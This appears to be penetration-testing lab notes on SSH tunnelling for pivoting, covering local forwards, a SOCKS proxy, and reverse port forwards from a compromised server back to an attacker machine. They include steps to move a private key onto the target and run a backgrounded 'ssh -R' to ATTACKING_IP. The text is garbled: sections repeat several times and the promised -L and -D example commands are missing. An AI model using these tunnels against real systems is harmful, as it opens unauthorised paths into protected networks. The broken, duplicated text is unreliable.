1 of 1

SSH Tunnelling / Port Forwarding

Forward Connections

Creating a forward (or "local") SSH tunnel can be done from the attacking box when we have SSH access to the target.

`Port Forwarding :` -L switch, which creates a link to a Local port.

For example, if we had SSH access to 172.16.0.5 and there's a webserver running on 172.16.0.10, we could use this command to create a link to the server on 172.16.0.10:

You can now access the website on 172.16.0.10 (through 172.16.0.5) by navigating to port 8000 on our own attacking machine with localhost:8000.

Good Practice use a high port, out of the way, for the local connection.

`Creating a proxy :` -D switch

For example: -D 1337. This will open up port 1337 on the attacking box as a proxy to send data through into the protected network.

This is useful when combined with a tool such as proxychains. An example of this command would be:

Reverse Connections

Reverse connections are very possible with the SSH client (and indeed may be preferable if you have a shell on the compromised server, but not SSH access).

They are, however, riskier as you inherently must access your attacking machine from the target -- be it by using credentials, or preferably a key based system.

Before we can make a reverse connection safely, there are a few steps to take:

SSH Tunnelling / Port Forwarding

Forward Connections

Creating a forward (or "local") SSH tunnel can be done from the attacking box when we have SSH access to the target.

`Port Forwarding :` -L switch, which creates a link to a Local port.

For example, if we had SSH access to 172.16.0.5 and there's a webserver running on 172.16.0.10, we could use this command to create a link to the server on 172.16.0.10:

You can now access the website on 172.16.0.10 (through 172.16.0.5) by navigating to port 8000 on our own attacking machine with localhost:8000.

Good Practice use a high port, out of the way, for the local connection.

`Creating a proxy :` -D switch

For example: -D 1337. This will open up port 1337 on the attacking box as a proxy to send data through into the protected network.

This is useful when combined with a tool such as proxychains. An example of this command would be:

Reverse Connections

Reverse connections are very possible with the SSH client (and indeed may be preferable if you have a shell on the compromised server, but not SSH access).

They are, however, riskier as you inherently must access your attacking machine from the target -- be it by using credentials, or preferably a key based system.

Before we can make a reverse connection safely, there are a few steps to take:

# 1. generate a new set of SSH keys and store them somewhere safe
ssh-keygen

# 2. Copy the contents of the public key, then edit the ~/.ssh/authorized_keys file on your own attacking machine.

# 3. New line, type the following line, then paste in the public key:
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-public-key

# 4. start the ssh service your the attacking machine
sudo systemctl start ssh

# 5. transfer the private key to the target server

# 6. With the key transferred, connect back with a reverse port forward (on the target server)
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

# or (In newer versions of the SSH client)
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

# 1. generate a new set of SSH keys and store them somewhere safe
ssh-keygen

# 2. Copy the contents of the public key, then edit the ~/.ssh/authorized_keys file on your own attacking machine.

# 3. New line, type the following line, then paste in the public key:
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-public-key

# 4. start the ssh service your the attacking machine
sudo systemctl start ssh

# 5. transfer the private key to the target server

# 6. With the key transferred, connect back with a reverse port forward (on the target server)
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN

# or (In newer versions of the SSH client)
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN

SSH Tunnelling / Port Forwarding

Forward Connections

Port Forwarding : -L switch, which creates a link to a Local port.

Creating a proxy : -D switch

Reverse Connections

SSH Tunnelling / Port Forwarding

Forward Connections

Port Forwarding : -L switch, which creates a link to a Local port.

Creating a proxy : -D switch

Reverse Connections

`Port Forwarding :` -L switch, which creates a link to a Local port.

`Creating a proxy :` -D switch

`Port Forwarding :` -L switch, which creates a link to a Local port.

`Creating a proxy :` -D switch